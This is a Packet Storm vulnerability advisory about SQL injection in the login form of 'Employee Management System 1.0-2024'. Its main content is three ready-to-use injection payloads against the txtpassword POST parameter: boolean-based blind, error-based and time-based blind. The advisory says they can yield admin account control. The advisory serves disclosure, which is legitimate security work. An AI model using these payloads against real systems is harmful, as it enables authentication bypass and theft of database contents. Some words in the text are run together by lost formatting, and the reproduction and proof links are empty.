

Employee Management System 1.0-2024 SQL Injection

Employee Management System version 1.0-2024 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

Packet Storm
## Title: employee_akpoly-management-system-1.0-2024 Multiple-SQLi## Author: nu11secur1ty## Date: 03/01/2024## Vendor: Software: Reference: Description:Potential SQLi detected in password parameter. Please confirm itmanually... The payload from the puncher_SQLi_bypass_authenticationmodule was submitted successfully after the test. You must testmanually to confirm this vulnerability! By using this vulnerabilitythe attackercan get control against an admin account and even more bad things!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: txtpassword (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR NOT2215=2215# TKHd&btnlogin=    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR (SELECT2145 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT(ELT(2145=2145,1))),0x716a787171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JjHm&btnlogin=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' AND (SELECT3563 FROM (SELECT(SLEEP(7)))nLaZ)# ZzRM&btnlogin=---```## Reproduce:[href]( Proof and Exploit:[href]( Time spend:00:35:00

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